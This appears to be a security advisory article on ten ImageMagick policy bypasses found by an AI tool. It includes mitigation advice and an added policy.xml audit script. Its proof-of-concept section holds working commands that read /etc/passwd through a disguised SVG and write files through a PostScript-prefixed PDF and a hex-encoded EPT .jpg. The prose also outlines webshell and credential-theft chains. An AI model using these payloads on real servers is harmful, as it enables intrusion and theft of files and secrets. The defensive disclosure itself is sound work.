AI Tool Discovers Critical Zero-Day Vulnerabilities in ImageMagick Default Policies
Take action: If you are using ImageMagick, first set the policy to limited. Disable GhostScript if your server does not strictly require PDF or PostScript processing; this removes the primary execution engine for these attacks. Always use a strict allow-list policy for ImageMagick coders rather than relying on the default settings provided by your operating system.
Octagon Networks' AI tool, pwn.ai, discovered 10 zero-day vulnerabilities and policy bypasses in the ImageMagick image processing library.
These flaws affect millions of servers across major Linux distributions and WordPress installations, allowing attackers to run malicious code or steal data through simple image uploads. Because these are newly discovered zero-days, official CVSS scores have not been assigned yet, and many remain unpatched in standard software repositories.
Vulnerabilities summary:
- Arbitrary file read via the text: coder in an SVG disguised as .jpg (High severity, bypasses open policy)
- Arbitrary file read via the label:@ coder on macOS (High severity, open policy)
- SVG magic bytes bypass of extension-based filtering across all file extensions (Medium severity, all policies)
- EPSI/EPI/EPSF coders not included in Ubuntu's default PS/EPS blocklist, invoking GhostScript (Critical severity, open policy and Ubuntu default)
- Single-byte (\n) prefix bypass of PostScript format detection while GhostScript still executes (High severity, all policies)
- PDF module not blocked in any policy, invoking the same GhostScript delegate as PS (Critical severity, bypasses open, limited, secure with gslib, and the maintainer's own recommended fix)
- EPT (Encapsulated PostScript with TIFF preview) magic bytes in .jpg bypass limited policy (Critical severity, affects ImageMagick versions up to 6.9.13-33, including Ubuntu 22.04's shipped version 6.9.11-60)
- gslib compiled-in GhostScript bypasses the secure policy's delegate blocking entirely (Critical severity, affects Amazon Linux, RHEL, Fedora, and other gslib-compiled systems)
- WordPress XML-RPC upload path skips content validation, enabling Author-level file write (High severity)
- WordPress with Gravity Forms (2M+ active installations) allows pre-authentication file write via Post Image fields (Critical severity)
These vulnerabilities enable unauthenticated remote code execution (RCE) on platforms like WordPress. Attackers can chain file writes to the /tmp directory with the Magick Scripting Language (MSL) to drop persistent webshells or poison PHP sessions to gain administrative access. Beyond full system takeover, these flaws enable RAM-exhaustion Denial-of-Service (DoS) attacks and the theft of critical environment variables, including AWS credentials and SSH keys.
The vulnerabilities affect ImageMagick across its default "open" security policy, the recommended production-grade "limited" policy, and on systems where GhostScript is compiled as a linked library (gslib), even the most restrictive "secure" policy.
Proof of Concept
File Read:
Works on Ubuntu 22.04 (fully updated, with the ImageMagick package shipped by default)
printf '<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500" height="500"><image xlink:href="text:/etc/passwd" x="0" y="0" width="500" height="500"/></svg>' > read.jpg
convert read.jpg output.png
# output.png contains /etc/passwd rendered as visible text
File Write via PDF:
printf '\n%%!PS-Adobe-3.0 EPSF-3.0\n%%%%BoundingBox: 0 0 100 100\n/f (/tmp/PWNED) (w) file def\nf (HI) writestring\nf closefile\nshowpage\n' > evil.pdf
convert evil.pdf out.png
cat /tmp/PWNED
# Output: HI
File Write via EPT .jpg:
printf '\xc5\xd0\xd3\xc6\x1e\x00\x00\x00\x7a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x0a\x25\x21\x50\x53\x2d\x41\x64\x6f\x62\x65\x2d\x33\x2e\x30\x20\x45\x50\x53\x46\x2d\x33\x2e\x30\x0a\x25\x25\x42\x6f\x75\x6e\x64\x69\x6e\x67\x42\x6f\x78\x3a\x20\x30\x20\x30\x20\x31\x30\x30\x20\x31\x30\x30\x0a\x2f\x66\x20\x28\x2f\x74\x6d\x70\x2f\x50\x57\x4e\x45\x44\x29\x20\x28\x77\x29\x20\x66\x69\x6c\x65\x20\x64\x65\x66\x0a\x66\x20\x28\x52\x43\x45\x29\x20\x77\x72\x69\x74\x65\x73\x74\x72\x69\x6e\x67\x0a\x66\x20\x63\x6c\x6f\x73\x65\x66\x69\x6c\x65\x0a\x73\x68\x6f\x77\x70\x61\x67\x65\x0a' > evil.jpg
convert evil.jpg out.png
cat /tmp/PWNED
These security flaws affect every major Linux distribution, including Ubuntu 22.04, Debian 11/12, RHEL, and Amazon Linux. WordPress installations are especially at risk because the core software relies on server-level policy.xml defaults, which are often insecure.
While a silent fix was introduced in ImageMagick 6.9.13-34, it has not been assigned a CVE or backported to many LTS distributions, leaving millions of servers exposed.
Security teams should update ImageMagick to the latest version and verify that dangerous coders like EPT, PDF, and MSL are explicitly disabled in the policy.xml file.
If PostScript processing is not required, removing the GhostScript package entirely provides the most effective protection against these exploit chains. For environments that must process untrusted PDFs, administrators should run ImageMagick within an isolated sandbox that lacks network access and uses a read-only file system.
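As an added example (not code from Octagon Networks or the ImageMagick project), the following Python audits a policy.xml for the coder gaps listed above and shows the allow-list form the advice recommends. Both policy files in it are constructed samples, not any distribution's real file, and its matcher assumes ImageMagick's documented rule order: entries are read top to bottom and the last matching entry decides a coder's rights.

```python
# Added example (not Octagon Networks' or ImageMagick's code): audit a policy.xml for the
# coder gaps described above. Rule order assumed: last matching glob wins, unmatched = all.
import fnmatch
import re
import xml.etree.ElementTree as ET

# Coders the article names as reaching GhostScript or giving file read/write primitives.
RISKY_CODERS = ["PS", "PS2", "PS3", "EPS", "EPSI", "EPI", "EPSF", "EPT", "PDF",
                "MSL", "TEXT", "LABEL", "SVG"]

# Constructed default-style policy: blocks PS/EPS but not the EPS aliases, EPT, PDF or MSL.
WEAK_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS}" />
</policymap>"""

# Constructed allow-list policy: deny everything, re-enable only needed raster formats.
HARDENED_POLICY = """<policymap>
  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" />
  <policy domain="coder" rights="read|write" pattern="{GIF,JPEG,PNG,WEBP}" />
  <policy domain="path" rights="none" pattern="@*" />
</policymap>"""

def _expand_braces(pattern):
    """Expand {A,B} alternation (as used in policy.xml) into plain glob patterns."""
    m = re.search(r"\{([^{}]*)\}", pattern)
    if not m:
        return [pattern]
    return [p for alt in m.group(1).split(",")
            for p in _expand_braces(pattern[:m.start()] + alt + pattern[m.end():])]

def effective_rights(policy_xml, domain, name):
    """Rights left for `name` in `domain` after the last matching <policy> entry."""
    rights = {"read", "write", "execute"}
    for pol in ET.fromstring(policy_xml).iter("policy"):
        if pol.get("domain") != domain:
            continue
        if any(fnmatch.fnmatchcase(name, p) for p in _expand_braces(pol.get("pattern", ""))):
            spec = pol.get("rights", "none").lower()
            rights = set() if spec == "none" else {r.strip() for r in spec.split("|")}
    return rights

def unblocked_risky_coders(policy_xml):
    """Coders from RISKY_CODERS that can still read or write under this policy."""
    return [c for c in RISKY_CODERS
            if effective_rights(policy_xml, "coder", c) & {"read", "write"}]

def indirect_reads_blocked(policy_xml):
    """True when the path domain denies '@file' arguments (e.g. label:@/etc/passwd)."""
    return not effective_rights(policy_xml, "path", "@/etc/passwd")
```

The delegate rule alone is not enough on gslib builds, which the article says bypass delegate blocking; the coder deny-all line is the layer that still holds there.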